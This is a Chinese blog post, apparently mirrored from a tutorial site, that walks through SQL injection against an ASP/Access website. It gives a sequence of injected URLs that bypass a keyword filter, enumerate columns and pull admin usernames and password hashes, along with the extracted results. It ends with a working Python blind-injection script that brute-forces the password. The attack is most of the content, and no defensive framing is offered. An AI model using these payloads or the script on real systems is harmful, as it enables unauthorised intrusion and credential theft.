zoukankan      html  css  js  c++  java
  • WEB安全 ACCESS 注入、盲注脚本

    http://www.xxx.cn/cp.asp?classid=3
    http://www.xxx.cn/cp.asp?classid=3 and //有拦截关键字
    http://www.xxx.cn/cp.asp?classid=3 AND 1=1 //大写绕过
    http://www.xxx.cn/cp.asp?classid=3 AND 1=2
    http://www.xxx.cn/cp.asp?classid=3 ORDER BY 8%16 //正常
    http://www.xxx.cn/cp.asp?classid=3 ORDER BY 9%16 //错误
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,2,3,4,5,6,7,8 FROM ADMIN%16 //返回正常,爆出可显示位2,说明存在admin表
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,id,3,4,5,6,7,8 FROM ADMIN%16 //返回4,5,7 说明分别有三个用户,ID分别为4,5,7

    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT TOP 1 1,admin,3,4,5,6,7,8 FROM ADMIN%16 //lxiaofu
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT TOP 2 1,admin,3,4,5,6,7,8 FROM ADMIN%16 //admin
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT TOP 3 1,admin,3,4,5,6,7,8 FROM ADMIN%16 //admin8
    或者
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,admin,3,4,5,6,7,8 FROM ADMIN WHERE id=4%16 //lxiaofu
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,admin,3,4,5,6,7,8 FROM ADMIN WHERE id=5%16 //admin
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,admin,3,4,5,6,7,8 FROM ADMIN WHERE id=7%16 //admin8
    再或者
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,admin,3,4,5,6,7,8 FROM ADMIN%16 //爆出 admin,admin8,lxiaofu

    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,pwd,3,4,5,6,7,8 FROM ADMIN%16 //爆出 4817cc8dcbb3fb5,ae0284ccc20bdde,bbd06203b2ba922


    整理下当前结果:
    id admin pwd
    4 lxiaofu bbd06203b2ba922
    5 admin ae0284ccc20bdde
    7 admin8 4817cc8dcbb3fb5

    但是以上MD5密文都是15位,正常应该是16位或者32位:

    先看一下pwd字段的长度:
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,LEN(pwd),3,4,5,6,7,8 FROM ADMIN%16 //返回16,表示密文是16位

    已知密文是16位,再来截取出第16位,条件为ID
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,MID(pwd,16,1),3,4,5,6,7,8 FROM ADMIN WHERE id=4%16 //f
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,MID(pwd,16,1),3,4,5,6,7,8 FROM ADMIN WHERE id=5%16 //8
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,MID(pwd,16,1),3,4,5,6,7,8 FROM ADMIN WHERE id=7%16 //c
    或者
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,(SELECT MID(pwd,16,1) FROM admin WHERE id=4),3,4,5,6,7,8 FROM ADMIN%16 //f
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,(SELECT MID(pwd,16,1) FROM admin WHERE id=5),3,4,5,6,7,8 FROM ADMIN%16 //8
    http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,(SELECT MID(pwd,16,1) FROM admin WHERE id=7),3,4,5,6,7,8 FROM ADMIN%16 //c


    整理下当前结果:
    id admin pwd
    4 lxiaofu bbd06203b2ba922f
    5 admin 4817cc8dcbb3fb58 
    7 admin8 ae0284ccc20bddec


    或者使用测试盲注脚本:

    import requests
    
    heads = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:52.0) Gecko/20100101 Firefox/52.0'}
    payloads='abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'
    
    pwd=[]
    
    for i in range(1,17):
        for payload in payloads:
            url = "http://www.xxx.cn/cp.asp?classid=24 AND ASC((SELECT TOP 1 MID(pwd,{},1) FROM admin))={}".format(i,ord(payload))
            response=(requests.get(url=url,headers=heads).content).decode(encoding='gbk')
            # print(url)
            if str("?Product_ID=194") in response:
                pwd.append(payload)
                print('
    ','pwd is:',payload,end='')
                break
            else:
                print('.',end='')
    print('
     [Done] pwd:',''.join([i for i in pwd]))
    

      

  • 相关阅读:
    [每日一题]一道面试题是如何引发深层次的灵魂拷问?
    值得关注的内推:字节内推「社招,校招及提前批,实习生」,每日面试题
    《人在囧途》系列
    Jmeter(三十三)
    hive with as 语法
    红蓝紫实战攻防演习手册2020
    hfish 集群蜜罐搭建
    CTF之MISC练习
    Struts2 S2-061(CVE-2020-17530)漏洞复现
    解决Windows资源管理器呼出上下文菜单(右键菜单)导致卡死的问题
  • 原文地址:https://www.cnblogs.com/i-honey/p/8006870.html
Copyright © 2011-2022 走看看